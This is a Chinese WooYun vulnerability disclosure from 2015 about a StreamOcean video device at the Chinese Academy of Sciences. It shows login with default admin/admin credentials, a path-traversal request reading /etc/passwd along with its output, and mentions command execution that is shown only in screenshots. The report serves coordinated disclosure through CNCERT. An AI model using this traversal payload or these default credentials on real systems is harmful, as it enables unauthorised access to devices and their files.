当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154926

漏洞标题:中科院某清流迅StreamOcean视频设备严重问题可完全控制

相关厂商:中国科学院

漏洞作者: nick被注册

提交时间:2015-11-27 14:08

修复时间:2016-01-15 17:30

公开时间:2016-01-15 17:30

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

中科院某清流迅StreamOcean视频设备严重问题可完全控制,反弹个shell如何

详细说明:

**.**.**.**:8080/


admin admin
登录进入,在系统日志这里:

xitongrizhi.jpg


<一> 任意文件下载
filename参数:

GET /download.php?type=syslogs&filename=caal-mgr.log.15


改成

GET /download.php?type=syslogs&filename=../../etc/passwd


renyiwenjianxiazai.jpg


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
lighttpd:x:100:101:lighttpd web server:/var/www/lighttpd:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
admin:x:0:0:admin:/home/admin:/bin/clish
zabbix:x:2000:2000::/home/zabbix:/sbin/nologin
<二> 命令执行
点查看:

chakan.jpg


mingling.jpg


看到参数名就呵呵了。。。。直接替换,回显在下方:

root.jpg


ifconfig.jpg


下面的就不多说了。都交互了

漏洞证明:

root.jpg


ifconfig.jpg

修复方案:

联系厂家如何

版权声明:转载请注明来源 nick被注册@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-01 17:30

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发中科院,由其后续协调网站管理单位处置。

最新状态:

暂无